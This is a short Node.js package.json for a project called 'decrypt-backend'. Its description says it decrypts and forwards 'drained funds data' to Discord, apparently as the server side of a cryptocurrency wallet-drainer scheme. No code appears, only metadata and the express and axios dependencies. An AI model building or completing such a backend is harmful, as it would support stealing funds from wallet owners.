{
  "name": "decrypt-backend",
  "version": "1.0.0",
  "description": "Decrypts and forwards drained funds data to Discord",
  "main": "index.js",
  "scripts": {
    "start": "node index.js"
  },
  "dependencies": {
    "express": "^4.18.2",
    "axios": "^1.4.0"
  },
  "engines": {
    "node": ">=16"
  }
}
